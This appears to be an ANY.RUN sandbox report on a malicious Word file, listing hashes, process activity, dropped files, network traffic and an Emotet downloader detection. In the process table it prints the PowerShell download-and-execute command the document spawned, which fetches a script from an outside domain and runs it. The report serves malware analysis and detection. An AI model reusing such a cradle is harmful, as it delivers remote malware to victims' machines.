analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

001_0079.doc

Full analysis: https://app.any.run/tasks/bb07a80e-cb64-4b90-8a65-9c6aa307100a
Verdict: Malicious activity
Threats:

Trojans are a group of malicious programs distinguished by their ability to masquerade as benign software. Depending on their type, trojans possess a variety of capabilities, ranging from maintaining full remote control over the victim’s machine to stealing data and files, as well as dropping other malware. At the same time, the main functionality of each trojan family can differ significantly depending on its type. The most common trojan infection chain starts with a phishing email.

Analysis date: November 14, 2018, 07:29:55
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
ole-embedded
generated-doc
trojan
Indicators:
MIME: application/vnd.openxmlformats-officedocument.wordprocessingml.document
File info: Microsoft Word 2007+
MD5:

123F22B392F34212B0CE0BA35D88B68C

SHA1:

FD7A1EBC57207F4E67D935F74954E0EC9F161524

SHA256:

F92F321294C3CFC7974734DFFAF7620018E39B51B03AB2017F9B46ACA1388A97

SSDEEP:

3072:hRPgvkTRDtieqb3YLk5Qj+ybcQGJoRDYk+HPQ7J8Z:3iy4dbIZ+8cQlRpK47J8Z

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Executes PowerShell scripts

      • WINWORD.EXE (PID: 1488)
    • Unusual execution from Microsoft Office

      • WINWORD.EXE (PID: 1488)
  • SUSPICIOUS

    • Creates files in the user directory

      • powershell.exe (PID: 2292)
  • INFO

    • Creates files in the user directory

      • WINWORD.EXE (PID: 1488)
    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 1488)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.docx | Word Microsoft Office Open XML Format document (52.2)
.zip | Open Packaging Conventions container (38.8)
.zip | ZIP compressed archive (8.8)

EXIF

ZIP

ZipRequiredVersion: 20
ZipBitFlag: 0x0006
ZipCompression: Deflated
ZipModifyDate: 1980:01:01 00:00:00
ZipCRC: 0xe7e476a5
ZipCompressedSize: 387
ZipUncompressedSize: 1562
ZipFileName: [Content_Types].xml

XML

Template: Normal.dotm
TotalEditTime: 1 minute
Pages: 1
Words: 6
Characters: 38
Application: Microsoft Office Word
DocSecurity: None
Lines: 1
Paragraphs: 1
ScaleCrop: No
HeadingPairs:
  • Название
  • 1
TitlesOfParts: -
Company: -
LinksUpToDate: No
CharactersWithSpaces: 43
SharedDoc: No
HyperlinksChanged: No
AppVersion: 16
Keywords: -
LastModifiedBy: 1
RevisionNumber: 2
CreateDate: 2017:11:02 15:45:00Z
ModifyDate: 2017:11:02 15:45:00Z

XMP

Title: -
Subject: -
Creator: alex
Description: -
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
33
Monitored processes
2
Malicious processes
1
Suspicious processes
0

Behavior graph

Click at the process to see the details
start winword.exe no specs powershell.exe

Process information

PID
CMD
Path
Indicators
Parent process
1488"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\001_0079.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
2292"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -noexit -c "$sr = (new-object System.IO.StreamReader ((([System.Net.WebRequest]::Create('http://pccreatief.nl/Jmdnaf36dd')).GetResponse()).GetResponseStream())).ReadToEnd();IEX $sr;"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
WINWORD.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Total events
2 104
Read events
1 199
Write events
0
Delete events
0

Modification events

No data
Executable files
0
Suspicious files
1
Text files
0
Unknown types
6

Dropped files

PID
Process
Filename
Type
1488WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVRA832.tmp.cvr
MD5:
SHA256:
1488WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\B26A6B1B.png
MD5:
SHA256:
1488WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\E1BFCEE1.wmf
MD5:
SHA256:
2292powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\NQ6YUVBDY1Z724ZX2BEZ.temp
MD5:
SHA256:
1488WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~$1_0079.docpgc
MD5:F72070C8F8603DE4B24DE526C3C3C942
SHA256:B9E702E506148B44A4C0AA36A6E5AA87B1936DFB9134862A48FF95E45F2484FB
1488WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\1724276E.datwmf
MD5:0A44FA82B89B29EC293FF4D3401BA775
SHA256:A3FDE8EB9DB55F73C6E65F9F4BE584F41830285EEEDA8CB4C314DBDF83932335
2292powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\27558961ea0fd255.customDestinations-msbinary
MD5:14262260672C8954FB8CB6B6CDF4C252
SHA256:419A3D1C9925B2386DBA5B2D5AF99E1FB4E85168B427993CFC392223B10B99C3
1488WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\6E49D497.emfemf
MD5:E8E6EECEA9BCFE9EC5357DFB0776F868
SHA256:3CC31FBD40B7D35C35598B5CE3FA1744859316E5A0AC51A435E73BDDFFD5C51F
1488WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotmpgc
MD5:59131AE46194C72AAA2801E1AD2642A0
SHA256:32C5BFAA5D065DD7FD36D9AD6A40361A8160F42BB4F98F164D4D8BCB0E92CEE3
1488WINWORD.EXEC:\Users\admin\AppData\Local\Temp\2.lnklnk
MD5:9D2180F3293F3EFE8512B8A1A2D69785
SHA256:98CFC72AD733E7474886280E5B3DCDEB79F8DFA0C3619A4EEC5C6998EF4DF52A
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
1
TCP/UDP connections
1
DNS requests
1
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
2292
powershell.exe
GET
404
85.25.192.252:80
http://pccreatief.nl/Jmdnaf36dd
DE
html
271 b
unknown
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
2292
powershell.exe
85.25.192.252:80
pccreatief.nl
Host Europe GmbH
DE
unknown

DNS requests

Domain
IP
Reputation
pccreatief.nl
  • 85.25.192.252
unknown

Threats

PID
Process
Class
Message
2292
powershell.exe
A Network Trojan was detected
SC TROJAN_DOWNLOADER Generic Trojan Emotet downloader
No debug info